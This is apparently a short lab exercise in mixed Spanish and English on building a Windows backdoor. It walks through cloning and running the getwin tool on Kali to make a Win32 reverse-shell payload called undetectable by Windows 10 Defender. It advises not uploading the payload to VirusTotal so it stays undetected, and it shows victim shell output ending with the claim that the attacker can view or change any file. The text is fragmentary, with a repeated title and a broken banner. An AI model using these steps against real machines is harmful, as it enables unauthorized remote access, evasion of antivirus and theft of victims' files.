Practica Backdoor
Practica Backdoor
Practica Backdoor
Steps
1. Start up Kali and fire up the Terminal console.
Probar lo siguiente
Windows shell is what, every hacker loves. There are various Windows payloads are designed to
bypass Windows OS security mechanism. According to ethical hacking researcher of
international institute of cyber security these payloads are well coded to get sessions of Windows
OS. There are many different ways of getting reverse shell. Today we will show getwin tool used
to create Win32 payload and listener.
Payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do Not
Upload the payload generated on virustotal.com.
For testing purposes, On attacker side we will use Kali Linux 2018.4 amd64 and on the Victim
side we will use Windows 10 1809.
Open terminal type git clone https://github.com/thelinuxchoice/getwin.git
Then type cd getwin & type chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads# cd getwin/
Type ./getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
_______ _ _ _ _
(_______) _ (_)(_)(_)(_)
_ ___ _____ _| |_ _ _ _ _ ____
| | (_ || ___ |(_ _)| || || || || _ \
| |___) || ____| | |_ | || || || || | | |
\_____/ |_____) \__) \_____/ |_||_| |_|v1.2
E:>C:
C:
C:>ipconfig
ipconfig
Windows IP Configuration
192.168.1.1
C:>getmac
getmac
=================== =============================================
=============
##-##-##-E8-##-## \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB
31D7FC}
Now attacker can change or view any file of target’s Windows 10 computer.